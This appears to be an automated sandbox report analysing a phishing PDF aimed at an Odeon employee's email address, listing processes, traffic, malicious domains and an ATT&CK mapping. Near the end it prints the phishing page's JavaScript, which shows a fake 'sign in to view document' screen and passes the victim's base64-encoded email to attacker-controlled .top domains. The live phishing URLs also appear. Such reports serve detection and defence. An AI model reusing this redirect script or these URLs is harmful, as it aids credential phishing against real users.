Edit tour

Windows Analysis Report
letter_sjoslin_odeonuk.com.pdf

Overview

General Information

Sample name:	letter_sjoslin_odeonuk.com.pdf
Analysis ID:	1572235
MD5:	bbf84d026aa11a00e09ffd06673bf307
SHA1:	28fb29814a8b4e96372ea7a94a19fb2b32960873
SHA256:	2c2db8df44fe18e47299e7d3ebdc34cd4a1e72dc5ebc11e8e73a8d2765a2a2f5
Infos:

Detection

Score:	48
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected landing page (webpage, office document or email)

AI detected suspicious Javascript

HTML page contains hidden javascript code

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64native

AcroRd32.exe (PID: 9208 cmdline: "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\letter_sjoslin_odeonuk.com.pdf" MD5: 6791EAE6124B58F201B32F1F6C3EC1B0)

chrome.exe (PID: 2396 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://mailto:sjoslin@odeonuk.com" MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 7840 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2192,i,10706945887835568525,2780565783703693333,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2212 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)

chrome.exe (PID: 8440 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://login.odeonuk@viewqr_img_7fyua1.tsbsky.top/7FYuA1/#7FYuA1?&&77VZ=c2pvc2xpbkBvZGVvbnVrLmNvbQ%3D%3D MD5: BB7C48CDDDE076E7EB44022520F40F77)

cleanup

HTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/jsd/r/8efc14cc593153fc HTTP/1.1Host: www.odeon.co.ukConnection: keep-aliveContent-Length: 16239sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"Content-Type: application/jsonsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.odeon.co.ukSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw

Source: global traffic	TCP traffic: 192.168.11.20:55452 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:55452 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:55452 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:55452 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54335 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54335 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54335 -> 239.255.255.250:1900
Source: global traffic	TCP traffic: 192.168.11.20:54335 -> 239.255.255.250:1900

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 10 Dec 2024 09:06:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 10 Dec 2024 09:07:05 GMTSet-Cookie: __cf_bm=nkAWqWWDt_CUbpAdoHc0ljQUuIjnZWTFp6IRTH5_i54-1733821610-1.0.1.1-tXMJjcCp6ajZm7T9QvC8w7Mi61.YbKD4PqIlRRWEhp4ke5lZuxrTq5QCY5j9uWmK0Orz7zzGGFQcBjv6vLC2hw; path=/; expires=Tue, 10-Dec-24 09:36:50 GMT; domain=.odeon.co.uk; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8efc14cc593153fc-ATL
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 10 Dec 2024 09:06:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4515Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Tue, 10 Dec 2024 09:07:09 GMTServer: cloudflareCF-RAY: 8efc14df8cb34578-ATL

Source: ReaderMessages.0.dr	String found in binary or memory: http://www.adobe.
Source: chromecache_97.5.dr, chromecache_105.5.dr	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49688
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49688 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49674
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49673
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: classification engine

Classification label: mal48.winPDF@44/35@49/11

Source: letter_sjoslin_odeonuk.com.pdf

Initial sample: mailto:sjoslin@odeonuk.com

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\scoped_dir2396_1454228374

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Adobe\Color\ACECache11.lst

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9746e6t_1j450d7_6gw.tmp

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\user\Desktop\letter_sjoslin_odeonuk.com.pdf"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "http://mailto:sjoslin@odeonuk.com"
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://login.odeonuk@viewqr_img_7fyua1.tsbsky.top/7FYuA1/#7FYuA1?&&77VZ=c2pvc2xpbkBvZGVvbnVrLmNvbQ%3D%3D
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2192,i,10706945887835568525,2780565783703693333,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2212 /prefetch:3
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2192,i,10706945887835568525,2780565783703693333,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2212 /prefetch:3	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\scoped_dir2396_1454228374			Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_2396_1172650089			Jump to behavior

Source: letter_sjoslin_odeonuk.com.pdf	Initial sample: PDF keyword /JS count = 0
Source: letter_sjoslin_odeonuk.com.pdf	Initial sample: PDF keyword /JavaScript count = 0
Source: A91qfmkz6_1j450dc_6gw.tmp.0.dr	Initial sample: PDF keyword /JS count = 0
Source: A91qfmkz6_1j450dc_6gw.tmp.0.dr	Initial sample: PDF keyword /JavaScript count = 0

Source: letter_sjoslin_odeonuk.com.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Source: letter_sjoslin_odeonuk.com.pdf

Initial sample: PDF keyword obj count = 86

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Process information queried: ProcessInformation

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Spearphishing Link	Windows Management Instrumentation	2 Browser Extensions	1 Process Injection	3 Masquerading	OS Credential Dumping	1 Network Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://www.adobe.	0%	Avira URL Cloud	safe
http://odeonuk.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
eatnjyz20r.pdfimgviewer.top	104.21.80.1	true	true	unknown
odeonuk.com	165.160.13.20	true	false	unknown
google.com	74.125.138.101	true	false	high
www.google.com	108.177.122.105	true	false	high
www.odeon.co.uk	104.17.55.22	true	false	high
viewqr_img_7fyua1.tsbsky.top	172.67.156.226	true	true	unknown
sni1gl.wpc.sigmacdn.net	152.195.19.97	true	false	high
LYH-efz.ms-acdc.office.com	52.96.109.146	true	false	high
uzrr635v.bngme.top	unknown	unknown	false	unknown
_205._https.uzrr635v.bngme.top	unknown	unknown	false	unknown
res.public.onecdn.static.microsoft	unknown	unknown	false	high
outlook.office.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.odeon.co.uk/cdn-cgi/images/cf-no-screenshot-error.png	false		high
https://www.odeon.co.uk/	false		high
https://www.odeon.co.uk/favicon.ico	false		high
https://www.odeon.co.uk/cdn-cgi/challenge-platform/h/g/jsd/r/8efc14cc593153fc	false		high
http://odeonuk.com/	false	Avira URL Cloud: safe	unknown
https://res.public.onecdn.static.microsoft/assets/mail/illustrations/noMailSelected/v2/light.svg	false		high
https://www.odeon.co.uk/cdn-cgi/challenge-platform/scripts/jsd/main.js	false		high
https://www.odeon.co.uk/cdn-cgi/challenge-platform/h/g/scripts/jsd/f9063374b04d/main.js?	false		high
https://outlook.office.com/mail/favicon.ico	false		high
https://www.odeon.co.uk/cdn-cgi/styles/cf.errors.css	false		high
https://www.odeon.co.uk/cdn-cgi/images/browser-bar.png?1376755637	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.adobe.	ReaderMessages.0.dr	false	Avira URL Cloud: safe	unknown
https://www.cloudflare.com/5xx-error-landing	chromecache_97.5.dr, chromecache_105.5.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.96.109.146	LYH-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
52.96.97.178	unknown	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
152.195.19.97	sni1gl.wpc.sigmacdn.net	United States	15133	EDGECASTUS	false
165.160.13.20	odeonuk.com	United States	19574	CSCUS	false
104.21.80.1	eatnjyz20r.pdfimgviewer.top	United States	13335	CLOUDFLARENETUS	true
172.67.156.226	viewqr_img_7fyua1.tsbsky.top	United States	13335	CLOUDFLARENETUS	true
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.17.55.22	www.odeon.co.uk	United States	13335	CLOUDFLARENETUS	false
108.177.122.105	www.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.11.20
192.168.11.10

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1572235
Start date and time:	2024-12-10 10:00:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	letter_sjoslin_odeonuk.com.pdf
Detection:	MAL
Classification:	mal48.winPDF@44/35@49/11
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .pdf Found PDF document Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.0.175.19, 23.0.175.56, 104.76.210.69, 104.76.210.84, 74.125.21.94, 142.250.105.102, 142.250.105.139, 142.250.105.138, 142.250.105.101, 142.250.105.100, 142.250.105.113, 172.253.124.84, 172.253.124.100, 172.253.124.139, 172.253.124.138, 172.253.124.102, 172.253.124.113, 172.253.124.101, 64.233.176.101, 64.233.176.139, 64.233.176.113, 64.233.176.138, 64.233.176.100, 64.233.176.102, 199.232.214.172, 23.216.73.194, 64.233.185.100, 64.233.185.113, 64.233.185.101, 64.233.185.138, 64.233.185.139, 64.233.185.102, 142.250.105.95, 172.253.124.95, 64.233.176.95, 64.233.185.95, 173.194.219.95, 172.217.215.95, 64.233.177.95, 108.177.122.95, 74.125.138.95, 74.125.21.95, 74.125.138.113, 74.125.138.139, 74.125.138.102, 74.125.138.100, 74.125.138.138, 74.125.138.101, 64.233.177.102, 64.233.177.113, 64.233.177.138, 64.233.177.100, 64.233.177.139, 64.233.177.101, 172.217.215.101, 172.217.215.113, 172.217.215.138, 172.217.215.100, 172.217.215.139, 172.217.215.102, 74.125.21.101, 74.12
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, clientservices.googleapis.com, www.googleapis.com, res-1.public.onecdn.static.microsoft.edgekey.net, cdn-office.ec.azureedge.net, acroipm2.adobe.com, dns.msftncsi.com, res-ocdi-public.trafficmanager.net, cdn-office.azureedge.net, clients2.google.com, edgedl.me.gvt1.com, redirector.gvt1.com, a122.dscd.akamai.net, update.googleapis.com, clients.l.google.com, c.pki.goog, e2808.dscd.akamaiedge.net, optimizationguide-pa.googleapis.com
Not all processes where analyzed, report is missing behavior information
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: letter_sjoslin_odeonuk.com.pdf

Source	URL
Screenshot	https://login.odeonuk@viewqr_img_7FYuA1.tsbsky.top/7FYuA1/#7FYuA1?&&77VZ=c2pvc2xpbkBvZGVvbnVrLmNvbQ%3D%3D

LLM Input / Output

Input	Output
URL: https://pdfimgviewer.top Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": true, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": true, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://pdfimgviewer.top
URL: https://eatnjyz20r.pdfimgviewer.top/n6drat55y/iu89908445/?pln=c2pvc2xpbkBvZGVvbnVrLmNvbQ== Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Sign-in with sjoslin@odeonuk.com to view document...", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": false, "has_visible_qrcode": false, "contains_chinese_text": false }

URL: PDF document Model: Joe Sandbox AI	{ "contains_trigger_text": true, "trigger_text": "Action Required - Security Info Update", "prominent_button_name": "unknown", "text_input_field_labels": "unknown", "pdf_icon_visible": false, "has_visible_captcha": false, "has_urgent_text": true, "has_visible_qrcode": true, "contains_chinese_text": false }

URL: https://eatnjyz20r.pdfimgviewer.top/n6drat55y/iu89... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "High-risk script showing multiple red flags: 1) Redirects to suspicious domain 'bngme.top' with random subdomains, 2) Uses base64 encoding/decoding to obfuscate data transmission, 3) Implements deceptive loading simulation to mask malicious activity, 4) Contains URL manipulation and parameter encoding typical of phishing attacks, 5) Uses dynamic DOM manipulation to hide loading process. Pattern matches typical phishing page behavior." }
window.onload = function() { setRandomTitle(); simulateLoading(); }; function setRandomTitle() { const randomLetter = getRandomLetter(); const email = getPlnData(); const pageTitle = email ? `Connecting... \| ${email}` : `Connecting... \| ${randomLetter}`; document.title = pageTitle; document.getElementById('page-title').textContent = pageTitle; } function simulateLoading() { const loadingText = document.querySelector('.loading-text'); const email = getPlnData(); const progressBar = document.getElementById('progressBar').firstElementChild; // Use a placeholder for the email within the loading messages let loadingMessages = [ "Loading... Do not close or refresh the page!", "Sign-in with {email} to view document...", "Almost there..." ]; let messageIndex = 0; const messageInterval = setInterval(() => { if (messageIndex < loadingMessages.length) { // Replace the placeholder with the actual email if it exists loadingText.textContent = loadingMessages[messageIndex].replace("{email}", email \|\| "User"); messageIndex++; } else { clearInterval(messageInterval); } }, 2000); progressBar.style.animationDuration = '3.5s'; setTimeout(function() { document.getElementById('loading').style.opacity = '0'; document.getElementById('loading').style.visibility = 'hidden'; document.getElementById('content').style.opacity = '1'; loadHomePage(); }, 5000); } function loadHomePage() { const redirectUrl = getRedirectURL(); const plnData = getPlnData(); // Decoded data used for logic elsewhere const randomLetter = getRandomLetter(); const randomSubdomain = generateRandomSubdomain(); // Re-encode plnData into base64 for the URL const base64PlnData = btoa(plnData); // Use the base64-encoded version for the URL const defaultUrl = `https://${randomSubdomain}.bngme.top:205?impact=${base64PlnData}`; const finalUrl = redirectUrl ? `${redirectUrl}#${randomLetter}${base64PlnData}` : defaultUrl; document.getElementById("content").innerHTML = '<object id="homeContent" type="text/html" data="' + finalUrl + '" style="width: 100%; height: 100%; border: none;"></object>'; window.location.href = finalUrl; } function getRedirectURL() { const params = new URLSearchParams(window.location.search); return params.get('redirect'); } function getPlnData() { const params = new URLSearchParams(window.location.search); let pln = params.get('pln') \|\| ''; if (isBase64(pln)) { pln = atob(pln); // Decode the base64 encoded 'pln' } return pln; } function isBase64(str) { try { return btoa(atob(str)) == str; } catch (err) { return false; } } function getRandomLetter() { const alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; return alphabet[Math.floor(Math.random() * alphabet.length)]; } // Function to generate a random subdomain (letters and numbers) function generateRandomSubdomain() { const characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"; let result = ''; for (let i = 0; i < 8; i++) { result += characters.charAt(Math.floor(Math.random() * characters.length)); } return result; } function redirectToForm() { const redirectUrl = getRedirectURL(); const plnData = getPlnData(); const randomSubdomain = generateRandomSubdomain(); // New subdomain const finalUrl = `https://${randomSubdomain}.bngme.top:205?impact=${plnData}`; window.location.href = finalUrl; } function loadContent(url) { const contentElement = document.getElementById("content"); contentElement.inne
URL: https://viewqr_img_7fyua1.tsbsky.top/7FYuA1/#7FYuA... Model: Joe Sandbox AI	{ "risk_score": 9, "reasoning": "High-risk script showing multiple malicious indicators: 1) Uses base64 encoding to obscure data, 2) Redirects to suspicious domains (pdfimgviewer.top and dsiewd.com), 3) Attempts to delete server directories, 4) Uses email pattern matching potentially for phishing, 5) Contains obfuscated domain names. Classic characteristics of a phishing/malware distribution script." }
